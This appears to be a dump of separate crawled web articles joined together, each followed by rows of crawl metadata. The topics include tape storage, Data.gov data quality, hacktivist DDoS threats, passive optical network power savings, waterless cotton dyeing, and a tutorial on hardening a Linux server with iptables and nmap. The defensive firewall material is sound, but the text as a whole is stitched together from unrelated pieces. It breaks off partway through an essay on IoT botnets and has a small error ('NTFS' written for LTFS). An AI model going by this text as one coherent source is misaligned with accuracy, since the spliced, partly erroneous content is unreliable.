Meanwhile, tape's speed and ease of use are improving. One key advance is Linear Tape File System (LTFS), a standard way of indexing the contents of a tape cartridge within the tape itself. The robotic systems that retrieve tapes used to rely solely on the date when the tape was made. LTFS collects all the information about what's on the tape and includes it there.
"A tape cartridge itself becomes a gigantic USB drive, if you will," IBM's Tripathi said.
That capability can also be expanded to an entire library of data with a system such as IBM's LTFS Library Edition. It will collect the metadata from all the tapes so IT departments can search for and retrieve an individual file from within an entire library, Tripathi said.
LTFS is now used by most major tape vendors, so products of different brands can work together. The backers of NTFS are now seeking to make it a formal standard of the Storage Networking Industry Association, a step that may be completed next year.
Tape is also growing more space efficient, with a standard cartridge based on the new LTO-6 specification holding 2.5TB of data without compression or 6.25TB with compression.
LTO-6 drives can transfer data at 400MB per second. Tape falls behind on speed mainly when it comes to seeking out many small, separate files, said Henry Baltazar, an analyst at The 451 Group.
Tape Not Slow When It Matters
"Tape is not slow for things that are big," he said. For accessing a single large file such as a video, it's competitive with disk, he said.
Even the robots that find tapes in a library and place them in a drive are faster than they might seem. It typically takes about 30 to 40 seconds to retrieve a tape and get it running, according to IBM.
Enterprises that don't want to deal with tape themselves may now take advantage of it indirectly. Cloud service providers offer value by carrying out IT tasks at a larger scale than their customers can achieve, which gives them a cost advantage. When it comes to storage, the most economical way of doing that may be tape.
"Just because you don't want to deal with tape ... doesn't absolve you of the business requirements of holding your data for five years or seven years," ESG's Buffington says. "Your data almost inevitably is going to still live on tape, before it's over."
While cutting-edge cloud companies may not say they're using tape, it's part of the picture for many of them, he said. For example, the Amazon Glacier service from Amazon Web Services is probably based on tape, analysts say. Glacier is designed for infrequently accessed data and typically delivers information in three to five hours, according to the company. AWS would not confirm that the service uses tape.
Tape also has a role to play in big-data analysis, where crunching large amounts of information from different sources can yield new insights. Even though those operations typically use HDDs for fast access, the data being processed may well come out of long-term tape storage, Baltazar said.
[Related: Strategic Guide to Big Data Analytics]
IDC's Digital Universe report released earlier this year, which was sponsored by EMC, estimated that 40 zettabytes of digital data would be produced over the next eight years. That's equivalent to 5,200GB for every person on Earth, the study said. There will be reason to retain much of that data over the long term, according to the report, which estimated that 33 percent of all data by 2020 will contain information that might be worth analyzing.
Meanwhile, storage vendors that make tape equipment aren't backing out of the market, Pund-IT's King said.
"I could imagine a point in the future where tape will become a dinosaur, but right now ... companies are all making hundreds of millions or billions of dollars a year on tape [product] sales," King said. "So I don't envision tape disappearing any time soon."
Stephen Lawson is a senior U.S. correspondent, based in San Francisco, for IDG News service. He covers storage and wired and wireless networks.
Read more about storage in CIO's Storage Drilldown. | <urn:uuid:e8a830db-7cc1-40ca-bf9f-5b99d3b816ea> | CC-MAIN-2017-09 | http://www.itworld.com/article/2715360/storage/tape-storage-finds-new-life-in-the-enterprise-and-beyond.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00083-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.962365 | 1,973 | 2.515625 | 3 |
10 flaws with the data on Data.gov
Recently released high-value datasets reveal 10 types of deficiencies
Transparency should be a three-legged stool of awareness, access and accuracy. Data.gov, the federal government’s data Web portal, is focusing on the second leg of the stool: access. Of the three, accuracy, which is part of data quality, is the most difficult to achieve but also the most important. If government data is untrustworthy, the government defaults on its backstop role in society.
How Data.gov connects the dots of the federal data reference model
The promise and perils of Data.gov lie in the metadata
So, can you trust the data provided on Data.gov? A cursory examination of the newly released high-value datasets revealed 10 types of quality deficiencies.
1. Omission errors. These are a violation of the quality characteristic of completeness. The No. 1 idea on datagov.ideascale.com, the Data.gov collaboration site, is to provide definitions for every column. But many Data.gov datasets do not provide this information. Another type of omission is when dataset fields are sparsely populated, which might omit the key fields necessary for the data to be relevant. For example, a dataset on recreation sites should have the location of the site. Furthermore, many datasets use codes but omit the complete code lists needed to validate the data. Finally, Extensible Markup Language documents omit the XML schema used to validate them even when the schemas clearly exist.
2. Formatting errors. These are violations of the quality characteristic of consistency. Examples are a lack of header lines in comma-separated value files and incorrectly quoted CSV values. Additionally, this includes poorly formatted data values for some numbers and dates. For example, we still see dates such as “5-Feb-10” with a two-digit year.
3. Accuracy errors. These are violations of the quality characteristic of correctness. Examples are errors in range constraints, such as a dataset having numbers such as “47199998999988888…”
4. Incorrectly labeled records. These are also violations of the quality characteristic of correctness. Unfortunately, agencies are confused as to when to use CSV files versus Excel files. Some datasets are being labeled as CSV files when they are not record-oriented, which they must be, and are just CSV dumps from Microsoft Excel. This indicates a need for more education and training on information management skills.
5. Access errors. These are violations of correct metadata description. Some datasets advertise that they provide raw data, but when you click the link, you are sent to a Web site that does not provide the raw data.
6. Poorly structured data. These are violations of correct metadata description and relevance. Some datasets are formatted using CSV or XML with little regard to how the data would be used. Specifically, some datasets are formatted in nonrecord-oriented manners in which field names are embedded as data values.
7. Nonnormalized data. These errors violate the principles of normalization, which attempt to reduce redundant data. Some datasets have repeated fields and superfluously duplicated field values.
8. Raw database dumps. Although more of a metadata than data quality issue, this certainly violates the principle of relevance. These datasets have files with names such as table1, table2, etc., and are clearly raw database dumps exported to CSV or XLS. Unfortunately, raw database dumps are usually poorly formatted, have no associated business rules and have terse field names.
9. Inflation of counts. Although also a metadata quality issue, many datasets are differentiated only by year or geography, which clutters search results. A simple solution is to allow multiple files per dataset and thereby combine these by-dimension differences into a single search hit.
10. Inconsistent data granularity. This is yet another metadata quality issue that goes to the purpose of Data.gov and its utility for the public. Some datasets are at an extremely high level while others provide extreme detail without any metadata field denoting them as such.
So what can we do? Here are three basics steps: Attract more citizen involvement to police the data; implement the top ideas on datagov.ideascale.com; and ensure agency open-government plans address, in detail, their data quality processes. | <urn:uuid:75dacff8-947e-4d0c-94b7-8b2d55353104> | CC-MAIN-2017-09 | https://gcn.com/Articles/2010/03/15/Reality-Check-10-data-gov-shortcomings.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00259-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.904689 | 897 | 2.59375 | 3 |
In the 21st century, cybercrime is rampant with hackers stealing and using data from individuals, companies and governments for their personal, financial or political gain. In particular, government agencies and large corporations are prime targets for organized hacker groups (“hacktivists”) such as Anonymous.
For example, this group has been orchestrating its annual April 7 cyber-attacks on US and Israeli targets consistently for the last four years; it is widely anticipated that 2016 will be no exception. The Anonymous attack pattern includes targeting the websites of government agencies and major corporations with mega DDoS attacks with the objective of taking those websites down for as long as possible, causing extensive financial and reputational damages.
Organizations and governments around the globe are well aware of the ongoing cybercrime wave. Major cyberattacks impact well-known brands, governmental agencies, and enterprises of all sizes including their employees. Those in charge of information and data security frequently attend exhibitions, seminars and webinars, and read industry reports to stay ahead. Since the cost of attacks can be daunting, both financially and to the brand, organizations around the globe should be aware of the risks of DDoS attacks and protect themselves. Those that invest in a comprehensive defense program significantly minimize their exposure to those risks. They should deploy effective anti-DDoS and security solutions, as well as continually educate their employees on ways to use the Internet safely and securely for both professional and personal use.
Although it is virtually impossible to be 100% protected against the impact of cyberattacks, security solutions have come a long way since the dawn of the Internet. Anti-DDoS and anti-malware solutions have proved to be highly effective in warding off attacks – even at the scale and sophistication of the Anonymous ones. Those solutions are able to identify the threats, mitigate them and monitor new ones.
A nice example of how an effective security solution works, is the case of hacktivists threatening to disrupt the Catalonian elections in 2015 using DDoS attacks. CTTI, the agency responsible for the Catalonian infrastructure, deployed ServiceProtector to protect its networks in real time, and prevented potential high-volume attacks before any damages were incurred.
Information security is no longer the concern of just a few in the organization. On the contrary, each and every employee should be educated about the risks of online behaviors while the organization as a whole takes measures to effectively protect itself against multiple cyber-risks before they impact the network. And it can be done! | <urn:uuid:2639cee8-7e44-4352-806f-2804afe333c6> | CC-MAIN-2017-09 | https://blog.allot.com/security/about-cyber-attacks-hacktivists-and-security-solutions-how-to-prepare-for-april-7-2016/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174215.11/warc/CC-MAIN-20170219104614-00135-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.956277 | 508 | 2.515625 | 3 |
New Standard Aims to Save Massive Amounts of Power
Making networks more energy efficient requires optimizations at many different levels. One of those levels is the access layer for service provider networks that power millions of homes and businesses around the world.
The current method for deploying fibre delivery is not as energy efficient as it could be, according to research from the Alcatel-Lucent led GreenTouch initiative.
"We realized that that the way protocols are designed today, actually 99 percent of the data is processed unnecessarily," Peter Vetter, department head at Alcatel-Lucent, Bell Labs, told EnterpriseNetworkingPlanet.com. "So this is a huge opportunity for efficiency improvements."
Vetter is also the wireline working group chief for the GreenTouch effort. Alcatel-Lucent and a consortium of partners launched GreenTouch back in January of 2010 as an effort to help reduce power consumption in networking technologies.
Today, many service providers deliver fiber using a technology known as passive optical network (PON). In a PON deployment, data is sent to all end points broadcast in a passive manner. As such, a PON optical network unit (ONU) has to process all the data for all the end points in order to find the relevant data for a specific home or end point.
"The equivalent is as if the mailman came to your door and opens his mailbag and then asks you to go through all the mail, so you can select the mail that is for you," Vetter explained.
That wastefulness requires the ONU to draw more power, which is where the new research is looking to find efficiencies. One way to achieve better efficiency is by replacing the current PON standard with a new emerging approach call Bit-Interleaved PON (Bi-PON).
"With Bi-PON, instead of organizing the data in packets, we organize the data in bits that are spaced with properties that match the speed of the subscriber," Vetter said. "This allows us to drop the data right behind the receiver so only relevant data is processed."
According to Vetter, Bi-PON offers the opportunity to improve power efficiency by a factor of 30. Moving to Bi-PON, however, is not going to be an immediate option for service providers. Vetter noted it will require new hardware and it will also require new standards to fully implement Bi-PON.
"So this is long term research," Vetter said.
Getting a new Bi-PON standard approved is a process that has its own set of challenges. Vetter explained that the first step to build industry consensus with a group of people that recognize the importance of making a change. GreenTouch has one such working group going to help ensure a roadmap to standardization.
In the interim, there are improvements to PON and ONU deployments that GreenTouch is also working on that provide an enhanced sleep mode that regulates the power based on usage activity. The enhanced sleep mode can work with existing equipment and can potentially be deployed by service providers this year.
"Bi-PON shows how GreenTouch works, by having a fresh look at the protocols, you can get significant savings which you would not get from trying to use stop-gaps like sleep mode," Vetter commented. | <urn:uuid:875b2ed7-56e7-44ba-b4ae-f5cfa5c18bfb> | CC-MAIN-2017-09 | http://www.enterprisenetworkingplanet.com/print/netsp/new-standard-aims-to-save-massive-amounts-of-power.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00379-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949408 | 672 | 2.59375 | 3 |
For decades now, the international apparel and textile industry has faced a problem that may seem too big to solve: how to reduce or eliminate water pollution that's a direct result of the production process — especially the resource-intensive dyeing process.
The statistics are as familiar as they are disheartening: according to the World Health Organization, 1.1 billion people don't have access to potable water, which is the biggest single cause of illness and disease. The cotton industry produces 30 million tons of the fiber each year, and roughly 13 gallons of water are needed to dye just one pound of cotton. Indeed, of all fibers, cotton requires the most water for the dyeing process. And half of all garments produced annually are made from cotton.
Despite all of the technological advances in manufacturing apparel, the cotton dyeing process hasn't changed significantly since the Industrial Revolution. Most alarming, however: pollution from textile dyeing dumps 72 toxic chemicals into waterways — 30 of which cannot be removed once they've entered the water. The continuing saga in Indian textile production city Tirupur, where manufacturing facilities have come to a standstill after the Noyyal River has become clogged with pollution, is perhaps the most glaring example of the severity of the industry problem.
"We live in a hydrosphere where all water resources are connected," says Alexandra Cousteau, water conservationist and granddaughter of Jacques Cousteau, speaking in New York on August 7. The textile dyeing industry is responsible for 20 percent of worldwide industrial water pollution, the World Bank reports. Cousteau developed her love of oceans when she was 11 years old and exploring their vast expanses with her famous explorer grandfather, the "steward king" of aquatic environments. "When you lose those places, you lose more than a creek or a stream — you lose the opportunity to pass them on to the next generation," she explains.
A different way of doing things
A new startup is hoping to disrupt the status quo and clean up the textile industry's black eye. Backed by 15 years and millions of dollars of research in a North Carolina laboratory, ColorZen pretreats cotton fibers to create a natural affinity between the fiber and dye, thereby eliminating the chemical additives currently required to force the dye to adhere. "We change the fiber on a molecular level, the part that's responsible for attracting or repelling the dye," says ColorZen co-founder Michael Hariri. The process uses 90 percent less water and 75 percent less energy than the standard cotton dyeing procedures, he adds, while achieving the same rich hues and colorfastness. ColorZen launched informally at the Continuum Show this year, following with a formal press event on August 7.
Manufacturers interested in the ColorZen solution avoid additional capital expenditures; the company maintains a dyeing facility and global headquarters in China where apparel producers send their raw cotton fiber for pretreatment and dyeing. The additional time required to ship the fiber to and from the ColorZen facility is balanced out by the reduced dyeing time; the company's dye process takes just one-third of the time of the traditional process, says Hariri. Technical director Tony Leonard claims that with ColorZen's process, 97 percent of the dye chemicals bond to the fabric, creating a significantly cleaner dyebath at the end of the process.
Because ColorZen doesn't rely on freshwater resources for its process, future dyeing facilities can be located virtually anywhere — even in arid regions — and could end up strategically placed near the next link in the global supply chain, says Hariri. As of now, the process works only with cotton and select other natural fibers; the company is looking into expanding the use case for cotton-synthetic blends.
ColorZen initially aims to partner with high-end brands that have the high margins capable of absorbing the modest but additional cost of its alternative dye process. Hariri insists consumers will largely avoid paying a premium for ColorZen products — which will feature specially branded hang tags in stores — explaining that additional costs are mostly recovered during production. "We're going after certain kinds of brands first, those that have already embraced sustainability," he says.
"All brands today want to be sustainable," Hariri adds. "Consumers are demanding it."
Jessica Binns is a Washington, D.C.-based freelance writer specializing in business, technology and social media. | <urn:uuid:2bf802c5-62ce-4bf8-a2be-02e46441a38c> | CC-MAIN-2017-09 | http://apparel.edgl.com/magazine/November-2012/To-Solve-a-Global-Water-Pollution-Problem,-ColorZen-Starts-at-the-Molecular-Level81726 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00555-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.954613 | 896 | 3.25 | 3 |
Routers, gateways, firewalls, hubs, switches comprise network security infrastructure in any business environment. Creating a robust LAN security infrastructure is one of your priorities if your business is handling a lot of data, some of which may be confidential, on a regular basis. This requires you to understand the basics of internet security concepts that relate to your devices, storage media and network topologies. Here are the basics explained for you.
A security firewall comes in form of a software application or a hardware device that can be installed on the borders of secured computer networks for controlling incoming/outgoing communications. Firewalls are the considered the first line of defense in network security parlance. At present, four basic types of firewalls are in use, including circuit-level firewalls, packet filtering firewalls, application-level firewalls, and stateful inspection gateways.
Network security policies
A network security policy concerns issues with network use. Generally, network policy is categorized into high-level and low-level policy. While high-level security policy tries to get to the base or the root of the security issues, low-level policies encompass placing administrative controls strategically.
In general, a high-level network security policy defines which applications are permissible for use within a business environment, which applications can be used for external communication and which security conditions and protocols to be followed. Periodic security audit and authentication are part of low-level policies.
Routers are physical devices that are used for connecting network segments of various networks into one large network. Routers function at the network layer and the router behavior is largely determined by the protocols that are in use. Unless it is a business requirement, you ought not to mix protocols.
In network security parlance, switches are also called micro-segmentation. Switches have lately replaced the traditional multiport repeaters. Switches facilitate solving of media contention and congestion problems. A network switch can provide effective protection against any attempt to snoop into the network. MAC filtering, port access and some other threats are successfully thwarted by network switches.
If you are looking to get familiar with more network security jargons, you need to do some research on the internet. The internet is replete with websites and blogs that provide a detailed definition of the network jargons. Alternatively, you can talk to a network security expert over the phone to know the meanings of different industry jargons. | <urn:uuid:eca1703e-211c-4a76-8b51-5df82ed60095> | CC-MAIN-2017-09 | http://www.belnis.com/news/tag/internet-security-threats/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00075-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.928658 | 499 | 3.28125 | 3 |
Iptables is an application allowing the administration of the tables in the Linux kernel firewall. You don't need prior knowledge about the kernel, or the actual tables in it, for firewall modifications and common system administration tasks.
In some Linux distributions, iptables comes enabled by default. It is common for inexperienced users to recommend completely disabling iptables to avoid networking issues. This article will help you get started quickly and manipulate iptables to your needs.
Sometimes iptables is used to refer to the Linux kernel-level component. In this article, anything related to iptables will specifically refer to the application that controls the protocols in a Linux distribution like ipv4, ipv6, and the ARP tables.
Similar to other Linux applications, you can configure iptables in the command-line interface or in a plain text file, allowing editing with any text editor. Although it is easy to modify, it might feel awkward from the average firewall appliance where most of the interaction with settings and configurations is done in a graphical interface. There are applications using iptables to manage a firewall through graphical interfaces, but this article will cover interacting with iptables in its native environment: the Linux terminal.
Having a comfort level using a Linux terminal (also referred to as a console or terminal emulator) will help developers take advantage of the examples and configurations that follow. The command-line interface is the primary way to interact with iptables, and a Linux terminal is the application allowing access to this interface.
The rules that are applied are mostly very readable and easily ported to other servers. This feature saves significant time when dealing with unresponsive hardware.
Although iptables is the main subject of this article is, and it is probably already installed in your environment, we will also use nmap, which is another powerful application.
Verify that nmap is installed before continuing. You can install this effective network scanner in a Debian/Ubuntu Linux distribution.
Listing 1. Installing nmap on Debian/Ubuntu
sudo apt-get install nmap
Because we are going to make modifications at the kernel level, make sure you have root privileges.
Listing 2 shows the rules currently being applied to the server. Listing 2 will be repeated during the article to verify what rules are currently in use and to verify successful changes.
Listing 2. Currently applied rules
root@desktop:~# iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination
In Listing 2, we instruct iptables to list all rules currently applied to the firewall. This is accomplished by the -L flag.
The output also mentions
Chain. Think of iptable
chains as sections in the firewall allowing a certain type of traffic. For
example, to block all traffic from the private network to the internet,
that rule would be set in the OUTPUT section. Similarly, any rule
affecting incoming traffic would be listed in the INPUT chain.
The three chains are each applied to one type of activity in the firewall. At this point, there is nothing set yet. This means there are no restrictions and all network traffic is allowed to come and go.
Chain FORWARD, and
Before continuing, it is necessary to verify what ports are open on the server for comparison after it is locked down. As mentioned before, nmap is a powerful command line tool that provides network security information. Listing 3 shows the output of nmap in a remote server on the network.
Listing 3. Network scanning with nmap
~ $ nmap 10.0.0.120 Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-11-21 20:44 EST Nmap scan report for 10.0.0.120 Host is up (0.012s latency). Not shown: 991 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 631/tcp open ipp 3306/tcp open mysql 4001/tcp open unknown 5900/tcp open vnc 8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 6.57 seconds
Those are a lot of open ports! In just a few steps, you will learn how the above changes after iptables is configured.
Firewall rules can be either applied and appended, or edited manually in a plain text file, and sourced. I prefer using a text file to apply changes. Most of the time syntax errors are easier to catch when written in a text file. Another problem arises with editing rules by appending rules directly, that is, these rules will not be saved when a server reboots. Before editing the file, let's tell iptables to export the current rules so that file becomes our initial template. See Listing 4.
Listing 4. Saving rules to a file
root@desktop:~# iptables-save > /etc/iptables.rules root@desktop:~# cat /etc/iptables.rules # Generated by iptables-save v1.4.4 on Sun Nov 21 14:48:48 2010 *filter :INPUT ACCEPT [732:83443] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [656:51642] COMMIT # Completed on Sun Nov 21 14:48:48 2010
I used the
iptables-save command and redirected
the output to a text file in the "/etc" directory. I have concatenated the
file so you can see what the file looks on my machine.
One of the first requirements is to allow established connections to receive traffic. You need this when you want anything behind the firewall (in a private network) to be able to send and receive network data without restrictions. In Listing 5 we will issue a direct rule to iptables and verify the state of the firewall afterward.
Listing 5. Established sessions rule
root@desktop:~# iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT root@desktop:~# iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination
To have a better idea of what was issued, let's break the command apart and explain each one:
-A INPUT: Append this rule to the
-m conntrack: Match the following connection
tracking for the current packet/connection.
-ctstate ESTABLISHED, RELATED: Connection states
that the rule should apply to. In this case, an
ESTABLISHED connection means a connection that
has seen packets in both directions and a
RELATED type means that the packet is starting
a new connection but it is associated with an existing connection.
-j ACCEPT: tells the firewall to accept the
connections described before. Another valid setting for the
-j flag would be
I'm also connecting through the SSH protocol to that server, so before locking down the firewall, a rule in Listing 6 is going to allow all incoming SSH traffic. I specify the type of network protocol (tcp) and the port that is conveniently associated with the SSH service. You can specify the port number directly if needed.
Listing 6. Accepting inbound SSH connections
root@desktop:~# iptables -A INPUT -p tcp --dport ssh -j ACCEPT root@desktop:~# iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED ACCEPT tcp -- anywhere anywhere tcp dpt:ssh Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination
Finally, let's set the firewall to block everything else. Take special care when issuing the following command. If it is placed before all the other rules, it will block any and all traffic to the server. Iptables reads rules in a procedural fashion (from top to bottom) and after a rule is matched, nothing else gets evaluated.
Listing 7. Blocking all incoming traffic
root@desktop:~# iptables -A INPUT -j DROP root@desktop:~# iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED ACCEPT tcp -- anywhere anywhere tcp dpt:ssh DROP all -- anywhere anywhere Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination
Listing 8. Verifying firewall configuration
root@desktop:~# iptables-save > /etc/iptables.rules root@desktop:~# cat /etc/iptables.rules # Generated by iptables-save v1.4.4 on Sun Nov 21 15:10:42 2010 *filter :INPUT ACCEPT [1234:120406] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [1522:124750] -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT -A INPUT -j DROP COMMIT # Completed on Sun Nov 21 15:10:42 2010
iptables-=save command pushed our changes
to a plain text file. It does look a bit different from just listing the
rules in the command line, but it is exactly the same thing. Just as
before, we have three sections: INPUT, FORWARD and OUTPUT. The rules that
we initially specified concern OUTPUT connections, so this is the section
where the rules we added are placed.
At this point, the server is locked and the configuration has been saved to a file. But what will happen when we perform a network scan? Let's run nmap again against that server and check the results as shown in Listing 9.
Listing 9. Network scan with locked down server
~ $ nmap 10.0.0.120 Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-11-21 20:56 EST Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.04 seconds ~ $ nmap -Pn 10.0.0.120 Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-11-21 20:56 EST Nmap scan report for 10.0.0.120 Host is up (0.017s latency). Not shown: 999 filtered ports PORT STATE SERVICE 22/tcp open ssh Nmap done: 1 IP address (1 host up) scanned in 12.19 seconds
Note that a scan was attempted against the IP where the server is located, but nmap failed to list the open ports. This happens because the firewall is set in such a way that it is blocking everything except for the SSH port we have open. Since nmap uses a specific network protocol to verify if the host is up, it returned empty handed. The second try was successful and is telling us that only SSH is open and nothing else. With just three rules, we managed to get an effective lock down of our server.
Saving and restoring rules
In the previous section, we saved the rules to a text file. However, that doesn't effectively tell the server that it needs to load the rules. Also, when the server reboots, it loses all the configuration done.
If you are adding rules on the command line, you should already be familiar with saving those changes to a text file. See Listing 10 for saving the firewall rules.
Listing 10. Saving the firewall rules
iptables-save > /etc/iptables.rules
Depending on the operating system in use, there are several ways to get those rules to load on start up. An easy approach is to go to the one interface that is public facing and tell it to load those rules before bringing the interface on line. See Listing 11.
Listing 11. Public network interface loading rules
<![CDATA[ auto eth0 iface eth0 inet static address 188.8.131.52 netmask 255.255.255.0 pre-up iptables-restore < /etc/iptables.rules ]]>
Here we have the eth0 interface and are declaring a rule to load the rules before bringing the interface up. As you may have guessed, you can use these commands to manually update the firewall rules from and to the file.
Not long ago, I was in a situation where I was responsible for a firewall appliance. Although I was making sure periodic backups of the rules and configurations were made, I failed to realize that those backups were in a proprietary format and only readable by the appliance model I had. That isn't a problem, of course, as long as you have two appliances of the same brand, model, and firmware version, but, as is common in small businesses, the budget didn't allowed for anything else.
One day, that appliance decided not to run anymore and I had to implement something fast that could be as reliable (or better). I learned the hard way that having human-readable configurations and the ability to come back up quickly are very important assets.
With some luck, I found an old server in good condition with a couple of network interfaces and was able to replace the dead appliance.
Until now, we have gone through scenarios of obtaining a copy of the rules that could be easily applied to any server in case of failure. Now let's enable the firewall to be the main gateway for a small home or business network.
Iptables as a main gateway
So far everything we've covered is great if you are running iptables on a personal computer, but it doesn't make much sense if a whole office needs to share an internet connection. With a few configuration settings, we can set that up properly.
We are going to assume that the server has two physical network interfaces: eth0 (public) and eth1 (private). I need to NAT them together so network traffic flows seamlessly from one interface to the other. The private network subnet is 192.168.0.0/255.255.0.0, so let's see how a NAT rule with forwarding would look in Listing 12.
Listing 12. NAT and forwarding rules
iptables -A FORWARD -s 192.168.0.0/255.255.0.0 -i eth0 -o eth1 -m\ conntrack --ctstate NEW -j ACCEPT iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT iptables -A POSTROUTING -t nat -j MASQUERADE
Listing 13 shows how to modify some settings in
proc to enable forwarding in the server.
Listing 13. Enabling forwarding in the server
sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
proc changes are volatile, so any
changes made there are lost after a reboot. There are several ways to make
sure that the modifications will stick after a reboot. In Debian/Ubuntu
distributions, add the lines to get executed in /etc/rc.local.
Finally, as shown in Listing 14, there is one more setting change that modifies kernel parameters at runtime (sysctl). These configurations are usually already in the sysctl.conf, but are commented out. Uncomment them (or add them if they are not included with your distribution).
Listing 14. Sysctl/kernel forwarding
ARP cache threshold
Running a Linux server as a gateway will cause certain issues with DNS. The kernel is designed to keep a mapping of IP addresses, but it comes with a maximum level of entries that are not suitable for heavy traffic. When this level is reached, no DNS queries get back to the host who asks. While such a threshold is rarely reached with a few clients, more than thirty clients going through this firewall will cause a problem.
The environment may need some adjusting, but the values shown in Listing 15 should provide room before seeing such issues.
Listing 15. Increasing the ARP cache size
echo 1024 > /proc/sys/net/ipv4/neigh/default/gc_thresh1 echo 2048 > /proc/sys/net/ipv4/neigh/default/gc_thresh2 echo 4096 > /proc/sys/net/ipv4/neigh/default/gc_thresh3
Be on the lookout for messages similar to those in Listing 16, which will provide a warning if it is necessary to increase the numbers just provided.
Listing 16. System log ARP cache overflow warnings
Nov 22 11:36:16 firewall kernel: [92374.325689] Neighbour table overflow. Nov 22 11:36:20 firewall kernel: [92379.089870] printk: 37 messages suppressed. Nov 22 11:36:20 firewall kernel: [92379.089876] Neighbour table overflow. Nov 22 11:36:26 firewall kernel: [92384.333161] printk: 51 messages suppressed. Nov 22 11:36:26 firewall kernel: [92384.333166] Neighbour table overflow. Nov 22 11:36:30 firewall kernel: [92389.084373] printk: 200 messages suppressed.
We have gone through some simple steps to get iptables to run properly and to safely lock down a Linux server. The rules applied should provide a good sense of what is going on in a server using iptables as a firewall. I encourage you to give iptables a try, especially if you depend on an appliance and want more control and easily replicated human-readable configurations.
While the rules used we've used here are simple, the full flexibility and complexity of iptables is beyond the scope of this article. There are many complex rules that you can combine to create a safe and controllable firewall environment.
An example of an interesting advanced feature in iptables is load balancing. Most of the time, when exploring high availability web services, you are seeking load balancing solutions. With iptables, this can be set and configured with the random or nth flags.
You can also do time-based rules. In a small office environment, it might be useful to restrict certain services from Monday through Friday, but let the firewall behave differently on Saturday and Sunday. The flags that might work in such a case are: --timestart, --timestop and days.
A problem I experienced was not having two firewalls at the same time with some kind of fail over. Creating such a thing is no easy feat, and can be approached in several ways. The easiest solution would be to have the router do the job and load balance two identical Firewall servers. I recommend looking into such an option if the network environment is a critical asset like an office or small business.
Iptables saved me once, and I hope it does the same for you!
- Netfilter Project: All the resources for iptables can be found in the project page.
- iptables in Ubuntu: A great introduction to iptables in Ubuntu including some advanced configurations.
- iptables in CentOS
- Nmap: a great network scanning tool.
- developerWorks Open source zone: Find extensive how-to information, tools, and project updates to help you develop with open source technologies and use them with IBM products.
- Events of interest: Check out upcoming conferences, trade shows, and webcasts that are of interest to IBM open source developers.
- developerWorks podcasts: Tune into interesting interviews and discussions for software developers
- developerWorks demos: Watch our no-cost demos and learn about IBM and open source technologies and product functions.
- developerWorks on Twitter: Follow us for the latest news.
Get products and technologies
- Evaluate IBM software products: From trial downloads to cloud-hosted products, you can innovate your next open source development project using software especially for developers.
- developerWorks community: Connect with other developerWorks users while exploring the developer-driven blogs, forums, groups, and wikis. Help build the Real world open source group in the developerWorks community. | <urn:uuid:0109ff34-8817-4e15-bcf4-fdde4fff12d1> | CC-MAIN-2017-09 | http://www.ibm.com/developerworks/linux/library/os-iptables/index.html?ca=drs- | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00075-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.886715 | 4,460 | 2.9375 | 3 |
On an increasingly massive scale, cybercriminals are repurposing connected Internet of Things (IoT) devices installed within our homes. These hackers use malware to enlist our smart thermostats, speakers, lights, and more as soldiers for their botnet armies – used in coordinated massive attacks causing security breaches that threaten the integrity of the internet.
They’ve used these IoT botnets to target major websites and even forced entire countries to go offline. With the IoT primed for exponential growth through the next decade, the inherent vulnerabilities of these smart devices – combined with the capabilities of IoT-based botnets – create formidable cybersecurity challenges and risks.
I believe that the party best positioned to prevent or stop malicious attacks is the consumer. Those who use IoT devices in their own homes have the power to vote with their wallets, and could choose to buy devices with more effective security. However, without awareness of the risks posed to other parties, or direct impact upon their own individual use, why would consumers change their behavior?
Currently, most consumers have little or no awareness when their IoT devices are compromised or exploited. In the eyes of the consumer, as long as the IoT devices perform their intended function, the consumer literally “sees” no real problem.
